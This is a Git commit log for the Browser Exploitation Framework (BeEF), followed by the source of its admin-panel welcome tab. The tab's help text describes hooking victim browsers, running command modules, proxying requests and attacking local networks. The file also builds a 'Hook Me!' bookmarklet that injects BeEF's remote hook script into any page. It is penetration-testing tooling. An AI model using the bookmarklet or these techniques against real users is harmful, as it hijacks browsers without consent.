* fixed offline zombie not deleting

* Bump jsdoc-to-markdown from 6.0.1 to 7.0.1 (#2161)

Bumps [jsdoc-to-markdown](https://github.com/jsdoc2md/jsdoc-to-markdown) from 6.0.1 to 7.0.1.
- [Release notes](https://github.com/jsdoc2md/jsdoc-to-markdown/releases)
- [Commits](https://github.com/jsdoc2md/jsdoc-to-markdown/compare/v6.0.1...v7.0.1)

---
updated-dependencies:
- dependency-name: jsdoc-to-markdown
  dependency-type: direct:development
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

* Bug: Core - 1785 Fixed public hook url configuration settings (#2163)

* added spec file for testing changes
* added local host getter to configuration class
* added default value 0.0.0.0 for local host if it's not set
* added port config getter with default
* added port config getter with default
* fixed spelling errors for port
* added public configuration values and validation
* removed logic from public port as it was not required
* added beef host to configuration class
* added beef port to configuration class and removed default http.port logic from public_port
* fixed rubocop errors and refactored spec tests
* added beef host configuration values used for external resources
* added beef url to configuration
* added spec file for testing changes
* added local host getter to configuration class
* added default value 0.0.0.0 for local host if it's not set
* added port config getter with default
* added port config getter with default
* fixed spelling errors for port
* added public configuration values and validation
* removed logic from public port as it was not required
* added beef host to configuration class
* added beef port to configuration class and removed default http.port logic from public_port
* fixed rubocop errors and refactored spec tests
* added beef host configuration values used for external resources
* added beef url to configuration
* created command spec file
* add before statement to load all enabled modules to test command class
* add spec to check if configuration instance exists by setting and accessing a config variable
* updated http proto for beef host
* reverting changes on this file, dev values set
* removed some unnecessary checks
* fixed grammar test now we're only testing one configuration attribute
* added hook url for contextual usage
* refactoring admin_ui with new code usage
* fixed issue with the location of the beef.http.https.public_enabled
* refactored powershell module and extension
* adding the new config setting for public https being enabled
* refactor qrcode extension
* replace video fake plugin refactor
* social engineering refactoring
* phonegap module refactoring
* exploit refactoring
* network module refactoring
* ipec module refactoring
* host module refactoring
* debug refactoring
* browser refactoring
* social engineering extension refactoring
* core main server refactoring
* core main console banner refactoring
* removing dev test
* fixed area with location of http.https.enabled
* changed the hook url definition to return the hook file path
* updated banners to use new configuration getters
* updated extensions and modules with the hook url change
* added new public.host configuration settings and validations for deprecated usage of public
* updated to use public.port configuration
* added validation for old configuration public_port
* updated to use public https configuration setting
* updated config with new settings format
* fixed get to point to new locations
* fixed pointer to hook_file_path
* Update extensions/social_engineering/web_cloner/web_cloner.rb

Co-authored-by: bcoles <bcoles@gmail.com>

* updated enabled to enable
* making sure default configuration file does not have preset values

Co-authored-by: bcoles <bcoles@gmail.com>

* bumped versions to 0.5.2.0

* Usability: #2145. Added user input request for beef update within 'beef' install script (#2162)

* added user input request for beef update
* swapped git pull from system to backticks
* flags added for auto update and timeout to input

* updated install.txt to reference the update-beef script (#2160)

Co-authored-by: Andrew Wheatley <a@andrews-mini.home>
Co-authored-by: Isaac Powell <36595182+DeezyE@users.noreply.github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: bcoles <bcoles@gmail.com>
75 lines
7.5 KiB
JavaScript
//
// Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

WelcomeTab = function() {

    // Server-side ERB: the hook URL is read from the BeEF configuration when this template is rendered.
    <%
        hook_url = BeEF::Core::Configuration.instance.hook_url
    %>

    // Bookmarklet that appends a script element pointing at hook_url, unless `beef` is already defined on the page.
    var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27<%= hook_url %>%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"

    // Static help text shown in the welcome panel; __BOOKMARKLETURL__ is a placeholder filled in below.
    welcome = " \
    <div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
    <p><img src='<%= @base_path %>/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
    <p>Official website: <a href='https://beefproject.com/'>http://beefproject.com/</a></p><br />\
    <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
    <p>Welcome to BeEF!</p><br /> \
    <p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
    <p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
    <p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
    <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
    <p>To interact with a hooked browser simply left-click it, a new tab will appear. \
    Each hooked browser tab has a number of sub-tabs, described below:</p><br /> \
    <ul style=\"margin-left:15px;\"><li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Details:</span> Display information about the hooked browser after you've run some command modules.</li> \
        <li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Logs:</span> Displays recent log entries related to this particular hooked browser.</li> \
        <li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Commands:</span> This tab is where modules can be executed against the hooked browser. This is where most of the BeEF functionality resides. \
            Most command modules consist of Javascript code that is executed against the selected\
            Hooked Browser. Command modules are able to perform any actions that can be achieved\
            through Javascript: for example they may gather information about the Hooked Browser, manipulate the DOM or perform other activities such as exploiting vulnerabilities within the local network of the Hooked Browser.<br /><br />\
            Each command module has a traffic light icon, which is used to indicate the following:<ul>\
                <li><img alt='' src='media/images/icons/green.png' unselectable='on'> The command module works against the target and should be invisible to the user</li>\
                <li><img alt='' src='media/images/icons/orange.png' unselectable='on'> The command module works against the target, but may be visible to the user</li>\
                <li><img alt='' src='media/images/icons/grey.png' unselectable='on'> The command module is yet to be verified against this target</li>\
                <li><img alt='' src='media/images/icons/red.png' unselectable='on'> The command module does not work against this target</li></ul><br />\
        <li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>XssRays:</span> The XssRays tab allows the user to check if links, forms and URI path of the page (where the browser is hooked) is vulnerable to XSS.</li> \
        <li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Proxy:</span> The Proxy tab allows you to submit arbitrary HTTP requests on behalf of the hooked browser. \
            Each request sent by the Proxy is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response.</li> \
        <li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Network:</span> The Network tab allows you to interact with hosts on the local network(s) of the hooked browser.</li> \
        <li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>IPEC:</span> Send commands to the victims systems using Inter-Protocol Exploitation/Communication (IPEC)</li> \
        <li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>WebRTC:</span> Send commands to the victims systems via a zombie specified as the primary WebRTC caller.</li> \
    </ul><br /> \
    <p>You can also right-click a hooked browser to open a context-menu with additional functionality:</p><br /> \
    <ul style=\"margin-left:15px;\">\
        <li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Tunneling Proxy:</span> The Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\". \
            The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Proxy tab. Click a history item to view the HTTP response headers and response body.</li> \
        <li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>XssRays:</span> XssRays allows the user to check if links, forms and URI path of the page (where the browser is hooked) is vulnerable to XSS. To customize default settings of an XssRays scan, please use the XssRays tab.</li></ul><br /> \
    <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Learn More</span></p><br />\
    <p>To learn more about how BeEF works please review the wiki:</p><br />\
    <ul style=\"margin-left:15px;\">\
        <li>Architecture of the BeEF System: <a href='https://github.com/beefproject/beef/wiki/Architecture'>https://github.com/beefproject/beef/wiki/Architecture</a></li>\
        <li>Tunneling Proxy: <a href='https://github.com/beefproject/beef/wiki/Tunneling-Proxy'>https://github.com/beefproject/beef/wiki/Tunneling-Proxy</a></li>\
        <li>XssRays Integration: <a href='https://github.com/beefproject/beef/wiki/XssRays-Integration'>https://github.com/beefproject/beef/wiki/XssRays-Integration</a></li>\
        <li>Network Discovery: <a href='https://github.com/beefproject/beef/wiki/Network-Discovery'>https://github.com/beefproject/beef/wiki/Network-Discovery</a></li>\
        <li>Writing your own modules: <a href='https://github.com/beefproject/beef/wiki/Command-Module-API'>https://github.com/beefproject/beef/wiki/Command-Module-API</a></li>\
    </ul>\
    <br/>\
    </div>\
    ";

    // Substitute the bookmarklet into the 'Hook Me!' link placeholder.
    welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);

    // Render the welcome text as the body of an Ext panel.
    WelcomeTab.superclass.constructor.call(this, {
        region:'center',
        padding:'10 10 10 10',
        html: welcome,
        autoScroll: true,
        border: false
    });
};

Ext.extend(WelcomeTab,Ext.Panel, {});